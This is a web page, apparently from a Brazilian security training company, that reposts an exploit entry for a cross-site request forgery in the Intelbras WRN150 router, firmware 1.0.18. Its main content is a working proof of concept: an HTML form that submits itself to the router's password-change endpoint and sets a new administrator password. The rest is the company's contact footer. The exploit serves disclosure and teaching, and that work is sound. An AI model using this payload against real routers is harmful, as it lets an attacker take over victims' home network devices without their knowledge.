fbpx

Intelbras Router WRN150 1.0.18 – Cross-Site Request Forgery

Intelbras Router WRN150 1.0.18 – Cross-Site Request Forgery

Título da exploração: Intelbras Router WRN150 1.0.18 – falsificação de solicitação entre sites
Data: 2019-10-25
Autor de Exploit: Prof. Joas Antonio
Página inicial do fornecedor: https://www.intelbras.com/pt-br/
Link do software: http://en.intelbras.com.br/node/25896
Versão: 1.0.18
Testado em: Windows
CVE: N / D

####################
# PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be

<html>
  <body>
    <form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
	<input type="hidden" name="GO" value="system_password.asp">
	<input type="hidden" name="SYSPSC" value="0">
      	<input class="text" type="password" name="SYSOPS" value="hack123"/> 
	<input class="text" type="password" name="SYSPS" value="mrrobot"/> 
	<input class="text" type="password" name="SYSPS2" value="mrrobot"/> 
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
11 de novembro de 2019

Sobre nós

A Linux Force Brasil é uma empresa que ama a arte de ensinar. Nossa missão é criar talentos para a área de tecnologia e atender com excelência nossos clientes.

CNPJ: 13.299.207/0001-50
SAC:         0800 721 7901

Comercial  Comercial: (11) 3796-5900

Suporte:    (11) 3796-5900

Copyright © Linux Force Security  - Desde 2011.